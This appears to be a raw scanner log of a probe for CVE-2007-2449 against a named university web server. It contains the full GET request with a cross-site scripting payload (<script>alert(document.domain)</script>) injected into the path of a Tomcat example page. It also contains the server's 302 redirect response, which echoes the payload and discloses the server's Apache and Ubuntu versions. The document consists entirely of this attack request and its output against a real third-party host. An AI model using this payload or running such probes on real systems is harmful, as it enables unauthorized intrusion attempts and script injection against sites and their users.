[CVE-2007-2449] Dumped HTTP request for http://web.mup.unimelb.edu.au/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp


GET /examples/jsp/snp/snoop.jsp;%3Cscript%3Ealert%28document.domain%29%3C/script%3Etest.jsp HTTP/1.1
Host: web.mup.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2007-2449] Dumped HTTP response http://web.mup.unimelb.edu.au/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp

HTTP/1.1 302 Found
Connection: close
Content-Length: 384
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 06 Aug 2025 15:18:46 GMT
Location: https://web.mup.unimelb.edu.au/examples/jsp/snp/snoop.jsp;%3cscript%3ealert(document.domain)%3c/script%3etest.jsp
Server: Apache/2.4.7 (Ubuntu)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://web.mup.unimelb.edu.au/examples/jsp/snp/snoop.jsp;%3cscript%3ealert(document.domain)%3c/script%3etest.jsp">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at web.mup.unimelb.edu.au Port 80</address>
</body></html>

